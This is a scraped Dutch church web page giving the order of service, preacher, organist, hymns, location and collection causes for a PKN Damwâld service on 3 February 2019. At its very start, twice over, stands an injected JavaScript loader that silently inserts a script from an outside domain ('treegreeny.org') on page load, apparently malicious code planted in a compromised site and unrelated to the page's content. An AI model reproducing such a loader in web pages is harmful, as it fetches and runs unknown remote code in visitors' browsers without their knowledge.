;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 3 februari 2019 14:00 uur - PKN Damwâld
zondag 3 februari 2019
14:00 uur

Kerkdienst zondag 3 februari 2019 14:00 uur

Informatie

Voorganger:Ds. H.F. de Vries, Ternaard
Organist:Jelte Cuperus
Liturgie
lied voor de dienst Psalm 84:1
Binnenkomst kerkenraad
Intochtslied: Psalm 68:7
Stil Gebed, Votum en Groet
Gebed om de Verlichting met de Heilige Geest
We lezen: Prediker 1: 1-11
We zingen: Gezang 1:1,2
We lezen: Prediker 9:13-10:1
We zingen: Gezang 1:3,4
Preek .
We zingen: Gezang 70:1,2,3,4,5,6
Lezing van de Apostolische Geloofsbelijdenis .
We zingen: Gezang 257
Dankzegging en Voorbeden – samen ‘Onze Vader’
Collecte
Slotlied : Gezang 456:1,2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Stichting Ontmoeting

Vastgelopen mensen worden door de stichting Ontmoeting ondersteund om hun leven weer op orde te krijgen. Stichting Ontmoeting leert hen weer op eigen benen te staan, relaties aan te gaan en te onderhouden en de juiste keuzes te maken. Zo krijgen deze mensen weer perspectief in hun leven. Dankzij vrijwilligers en medewerkers kunnen we deze missie uitvoeren. Ze zetten zich met hart en ziel in voor hun medemens. Door een luisterend oor of praktische begeleiding te bieden. Of door ondersteunende taken te verrichten.

Tweede collecte: Kerk
Uitganscollecte: Werelddiaconaat

Help Bangladesh in de strijd tegen het water:
Ieder jaar treden in Bangladesh tijdens de moesson de rivieren buiten hun oevers. Dat zorgt voor vruchtbaar land. Maar de overstromingen, die door de klimaatverandering talrijker en heftiger worden, zijn ook een ramp voor de inwoners. Partners van Kerk in Actie helpen de mensen beter voorbereid te zijn op overstromingen zodat de gevolgen beperkt blijven.